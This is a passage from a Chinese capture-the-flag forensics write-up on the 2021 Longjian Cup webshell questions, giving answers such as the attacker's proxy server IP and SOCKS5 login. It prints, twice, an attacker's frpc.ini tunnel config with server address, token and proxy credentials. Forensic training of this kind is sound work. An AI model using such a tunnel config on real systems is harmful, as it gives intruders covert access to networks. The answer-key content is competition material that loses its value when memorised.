应该是用蚁剑上传了一个文件：

L3Zhci93d3cvaHRtbC9mcnBjLmluaQ==base64解码->/var/www/html/frpc.ini

肯定是frp了，也可以把附件导出来看：

毫无疑问了：frpc（问的是客户端名字）

6、Webshell-6

黑客代理工具的回连服务端ip是_。

直接看前面导出来的frpc.ini：

[common]server_addr = 192.168.239.123server_port = 7778token=Xa3BJf2l5enmN6Z7A8mv[test_sock5]type = tcpremote_port =8111plugin = socks5plugin_user = 0HDFt16cLQJplugin_passwd = JTN276Gpuse_encryption = trueuse_compression = true

服务端IP：192.168.239.123

7、Webshell-7

黑客的socks5的连接账号、密码是__。（中间使用#号隔开，例如admin#passwd）

还是上面的frpc.ini文件：

[common]server_addr = 192.168.239.123server_port = 7778token=Xa3BJf2l5enmN6Z7A8mv[test_sock5]type = tcpremote_port =8111plugin = socks5plugin_user = 0HDFt16cLQJplugin_passwd = JTN276Gpuse_encryption = trueuse_compression = true

账号密码：0HDFt16cLQJ#JTN276Gp

原文始发于微信公众号（南有禾木）：DIDCTF-2021陇剑杯

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

前言